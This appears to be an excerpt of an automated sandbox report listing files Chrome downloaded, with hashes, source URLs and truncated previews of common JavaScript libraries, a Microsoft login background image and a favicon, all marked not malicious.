                                                                                  Preview:"use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){jt(l,o,c,v,h,"next",s)}function h(s){jt(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (65429)
                                                                                  Category:downloaded
                                                                                  Size (bytes):7479953
                                                                                  Entropy (8bit):5.82653638002625
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:9BB11DB32F34E92698F9C0D6A9C14E48
                                                                                  SHA1:EDD6224A9E0052EBB7498C0167CCF636D8BAB67D
                                                                                  SHA-256:AFEABA1C979C006BB6DA99D91CC11B721A07A87BB256AB99804E8629F393CB29
                                                                                  SHA-512:3669DD72B25EB0D26B644E922397E6419D24B40B2CEB11D8324DF441B9645C9890EAEB33125AE97870F35EDFE4D8EB71C7838645628ACC7F091690E3E1C7957F
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cdn1.cloud-database.co/namespace/scripts/k_efa5e0135cbc285f5860bfd6665b0ecf89ff0d7a.js
                                                                                  Preview:/*! For license information please see renderer_efa5e0135cbc285f5860bfd6665b0ecf89ff0d7a.js.LICENSE.txt */.(function(){var __webpack_modules__=[,function(e,t,n){"use strict";n(2);var i,r=(i=n(290))&&i.__esModule?i:{default:i};r.default._babelPolyfill&&"undefined"!=typeof console&&console.warn&&console.warn("@babel/polyfill is loaded more than once on this page. This is probably not desirable/intended and may have consequences if different versions of the polyfills are applied sequentially. If you do need to load the polyfill more than once, use @babel/polyfill/noConflict instead to bypass the warning."),r.default._babelPolyfill=!0},function(e,t,n){"use strict";n(3),n(260),n(262),n(265),n(268),n(270),n(272),n(274),n(276),n(278),n(281),n(283),n(285),n(289)},function(e,t,n){n(4),n(54),n(55),n(56),n(57),n(59),n(61),n(62),n(63),n(64),n(65),n(66),n(67),n(68),n(69),n(71),n(73),n(75),n(77),n(80),n(81),n(82),n(86),n(88),n(90),n(93),n(94),n(95),n(96),n(98),n(99),n(100),n(101),n(102),n(103),n(104
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (519)
                                                                                  Category:downloaded
                                                                                  Size (bytes):12821
                                                                                  Entropy (8bit):5.208756062123649
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:0899F764C85BBCC13206E3DD8318E678
                                                                                  SHA1:BAA693E82387A328ABCCF9694C6D2DB571AC8ACA
                                                                                  SHA-256:0F201FE52208471C863C292DA4990CA7BB7CA5D58B3F1EA2A57095FF764C6848
                                                                                  SHA-512:C8E3B79867D46591AB6899EFFF133EDF945C0F8BD757B09710CA898823EBB1FB4617A5E6BC8F4EB972A8A4F0F4BF2D177CC2551B4C8C1FF8921D3E08B9B9EF08
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/underscore.js/1.3.3/underscore-min.js
                                                                                  Preview:// Underscore.js 1.3.3.// (c) 2009-2012 Jeremy Ashkenas, DocumentCloud Inc..// Underscore is freely distributable under the MIT license..// Portions of Underscore are inspired or borrowed from Prototype,.// Oliver Steele's Functional, and John Resig's Micro-Templating..// For all details and documentation:.// http://documentcloud.github.com/underscore.(function(){function r(a,c,d){if(a===c)return 0!==a||1/a==1/c;if(null==a||null==c)return a===c;a._chain&&(a=a._wrapped);c._chain&&(c=c._wrapped);if(a.isEqual&&b.isFunction(a.isEqual))return a.isEqual(c);if(c.isEqual&&b.isFunction(c.isEqual))return c.isEqual(a);var e=l.call(a);if(e!=l.call(c))return!1;switch(e){case "[object String]":return a==""+c;case "[object Number]":return a!=+a?c!=+c:0==a?1/a==1/c:a==+c;case "[object Date]":case "[object Boolean]":return+a==+c;case "[object RegExp]":return a.source==.c.source&&a.global==c.global&&a.multiline==c.multiline&&a.ignoreCase==c.ignoreCase}if("object"!=typeof a||"object"!=typeof c)return!1;f
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                  Category:downloaded
                                                                                  Size (bytes):1864
                                                                                  Entropy (8bit):5.222032823730197
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                  SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                  SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                  SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                  Category:downloaded
                                                                                  Size (bytes):15406
                                                                                  Entropy (8bit):5.169027013944884
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:09F07FA334834D385DC4B51217FA54D5
                                                                                  SHA1:1C89F995AAC7A5F1035A2E9E0216F0A62E1C37EC
                                                                                  SHA-256:6F4BE739105C7AA668832B182B6AAE88BE5C02EC6E8F8C3099D29311BB4AB7F3
                                                                                  SHA-512:2738153DD6DF18A085D1D6E366C30672640B9641D6A194C7A9BC51B7CBA5E443F8038100790C2787879E345046D5F1CF16FBBE4AFEAF1927519CB17D7B2AA836
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://mahoganydevelopment.knack.com/favicon.ico
                                                                                  Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... .............................................`.x a.t.^.q.].o.[.o.............................................^.y.f.x.c.v.a.t.^.q.Z.mD............................s".5j...........j.|.h.z.f.x.c.u.`.sE........W.iUQ.h.....z!..w&..u%..u$..t#.Q....n ..m...j.|.g.z.b.x"U.U.^.r.Z.m.X.j.Q.h.{*..{)..{)..y(..x'..v&..t#..q"..o!..l.~.d.|!e.x.b.t.^.q.[.m.W.j..-..-...,..~+..}*..{)..y(..v%..s$..p!..m ..j.|.f.x.b.t.^.p.Z.n....M./...0../...-...,..}*..z)..w'..t$..q"..m ..i.{.e.w.a.t.].pB........f..../.R.1../...-...+..{)..x'..t$..p"..m.~.g.yc].t..........*...8.e.6..4...2...0.......,..|)..x'..t$..n..Q.............:.F.;..:...8...7...5...3...1.......+..{)..v&..r#..n ..i.|.c.wK.>...>...=...<...:...7...5...3...0...-..}*..y'..t$..p!..k.}.f.y.A...B...@...?...<...4.".8...5...2......~*..{)..v&..q#..m...j.{..@...E..C...A..U....;.'.9...6...3...1......{(.Mx&..s$..o ..h........C...C.T.........;.I.;...8...5...1..........f...r$.1f.f...............
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (48664)
                                                                                  Category:downloaded
                                                                                  Size (bytes):48944
                                                                                  Entropy (8bit):5.272507874206726
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                  SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                  SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                  SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                                                  Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (32012)
                                                                                  Category:downloaded
                                                                                  Size (bytes):69597
                                                                                  Entropy (8bit):5.369216080582935
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                  SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                  SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                  SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                                  Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                  No static file info